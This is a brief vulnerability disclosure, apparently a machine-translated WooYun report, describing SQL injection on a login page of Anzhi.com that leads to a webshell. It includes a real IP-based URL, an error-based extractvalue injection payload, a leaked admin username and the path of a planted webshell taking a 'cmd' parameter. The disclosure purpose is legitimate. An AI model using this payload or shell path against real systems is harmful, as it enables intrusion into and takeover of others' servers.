漏洞标题 Anzhi.com一站SQL注入到Getshell中 相关制造商 安志 漏洞作者 Depycode 提交时间 2016-06-08 08: 21 公共时间 2016-06-13 17: 27 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 20 漏洞状态 该漏洞已通知供应商,但供应商忽略了该漏洞 标签标签 Mysql的 漏洞详细信息 只需扫描一个IP段然后找到它 http://182.18.63.104: 82/login.php?action=login
登录和单引号错误
'或extractvalue(1,concat(0x7e,database()))或' /home/www2/gamecenter.com/data/DB.php: 210无法查询: XPATH语法错误:'~market_king' 然后注入
注入帐户密码 Gcadmin:管理员 背景很简单
然后是shell
http://182.18.63.104: 81/res/ad_soft/20160607110515_576436_load.php cmd
找到的域名:m.goapk.com
漏洞证明:
修理计划: . 版权声明:请注明来源depycode @乌云